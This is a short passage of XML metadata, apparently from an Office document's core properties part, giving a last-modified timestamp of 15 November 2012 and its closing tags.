  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-11-15T16:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>